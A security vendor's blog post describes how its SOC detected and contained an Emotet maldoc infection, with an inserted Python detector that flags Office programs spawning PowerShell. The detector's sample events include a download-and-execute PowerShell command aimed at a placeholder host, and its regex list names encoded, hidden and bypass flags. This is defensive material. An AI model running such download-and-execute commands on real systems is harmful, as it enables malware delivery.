Emotet: What Happens When Users Open the Attachment

July 10, 2019 | 1 min read

BlueVoyant

“Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities.

Emotet is one of the most prolific variants of malware today. In Q1 2019 it accounted for over 40% of all detections by the BlueVoyant SOC. Emotet is a banking trojan designed to steal account details. It steals FTP credentials. It also steals emails, which it uses to disguise itself as legitimate communication so that it can move laterally across the network.

Emotet has evolved in sophistication. In recent variants, we have seen it morph into a dropper that delivers other malware, ransomware and banking trojans (read Top 5 Cybercrimes and Prevention Tips for more information on these cyber crimes and others). It is polymorphic and evades signature-based detection by changing every time it is downloaded. It can detect when it is running in a sandbox and will go dormant to avoid detection. Emotet is a very nimble malware that employs multiple techniques for lateral movement.

In a recent attack, 48 users received a phishing email with a malicious .doc (maldoc) attached. Despite internal security training, two users opened the attachment. This executed a VBA (Visual Basic for Applications) script, infecting the two devices. Our SOC analysts saw the users open the emails and execute the maldoc. The initial investigation revealed that the maldoc was not a known malware identified on any threat intelligence source. They determined it was malicious and immediately blacklisted it.

We also observed a PowerShell script with suspicious command-line arguments kick off on the infected devices. As a result, the SOC immediately quarantined the infected devices to prevent the attack from moving laterally through the network. The attack took place early in the morning. These actions were completed before the morning rush to work, preventing others from opening the malicious email.
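The detection chain described above (Office document runs a VBA script, which launches PowerShell with suspicious command-line flags) is the kind of behaviour a SOC can catch from process-creation telemetry alone, without a signature for the maldoc itself. The script below is an added example written for this post; it is not BlueVoyant's code and the event lines are constructed, not the client's telemetry. It assumes a simplified pipe-delimited process-creation record (timestamp, host, parent image, child image, command line), flags any Office application spawning a shell interpreter, and scores the command line with weighted indicators (encoded command, hidden window, execution-policy bypass, download-and-evaluate) so that the alert carries a severity. Process names, indicator weights and the severity threshold are illustrative choices, not values from the post.

```python
"""Flag Office-spawned shells with suspicious PowerShell command lines.

Added example for the incident described in the post. Log format, sample
events, indicator list and weights are all constructed for illustration.
"""
import re

# Parent processes that should rarely launch a scripting host or shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Child processes a macro typically uses to stage the next payload.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# (pattern, label, weight): each pattern counts at most once per command line.
INDICATORS = [
    (re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)(\s|$)"), "encoded-command", 3),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden-window", 2),
    (re.compile(r"(?i)-nop(rofile)?\b"), "no-profile", 1),
    (re.compile(r"(?i)-noni(nteractive)?\b"), "non-interactive", 1),
    (re.compile(r"(?i)-e(xecutionpolicy|p)\s+bypass"), "ep-bypass", 2),
    (re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                r"\biex\b|invoke-expression)"), "download-or-eval", 3),
]

# Constructed sample events: timestamp|host|parent image|child image|command line
SAMPLE_EVENTS = [
    "2019-07-10T06:12:41Z|WS-042|winword.exe|powershell.exe|"
    "powershell.exe -nop -w hidden -enc <base64-placeholder>",
    "2019-07-10T06:13:05Z|WS-017|explorer.exe|powershell.exe|"
    "powershell.exe -File C:\\scripts\\backup.ps1",
    "2019-07-10T06:14:22Z|WS-088|excel.exe|cmd.exe|"
    "cmd.exe /c powershell -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/x')\"",
    "2019-07-10T06:15:00Z|WS-042|winword.exe|splwow64.exe|splwow64.exe 12288",
    "2019-07-10T06:16:30Z|SRV-01|services.exe|powershell.exe|"
    "powershell.exe -NonInteractive -NoProfile -Command Get-Service",
]


def parse_event(line):
    """Split one record into its fields; the command line may itself contain '|'."""
    ts, host, parent, child, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent, "child": child, "cmdline": cmdline}


def score_command_line(cmdline):
    """Return (total weight, matched labels) for the indicators present."""
    score, labels = 0, []
    for pattern, label, weight in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            labels.append(label)
    return score, labels


def detect(lines, high_threshold=5):
    """Produce alerts for Office->shell launches and for high-scoring shell command lines."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, labels = score_command_line(ev["cmdline"])
        office_spawn = (ev["parent"].lower() in OFFICE_PARENTS
                        and ev["child"].lower() in SHELL_CHILDREN)
        if office_spawn:
            rule = "office-spawned-shell"
        elif score >= high_threshold:
            rule = "suspicious-shell-cmdline"
        else:
            continue  # benign: no Office parent and no strong indicators
        severity = "high" if (office_spawn and score >= high_threshold) else "medium"
        alerts.append({"ts": ev["ts"], "host": ev["host"], "rule": rule,
                       "severity": severity, "score": score, "indicators": labels,
                       "parent": ev["parent"], "child": ev["child"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']} {alert['severity'].upper():6} "
              f"{alert['rule']} score={alert['score']} {alert['parent']} -> "
              f"{alert['child']} {alert['indicators']}")
```

Run against the constructed events, only the two Office-spawned shells alert; the administrator's scheduled backup script and the service-launched `Get-Service` call score low and stay quiet. In production the parent/child pair is the durable signal (it is what the maldoc's VBA script must do regardless of how the PowerShell stage is obfuscated), and the indicator score mainly decides how fast an analyst is paged and whether the host is isolated automatically.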

As a follow-up, we provided the client with the Command and Control (C2) IP addresses found in the VBA script. Emotet retrieves payloads and installs updates from C2 servers. We also delivered indicators identified in the PowerShell script to help detect and prevent future attacks.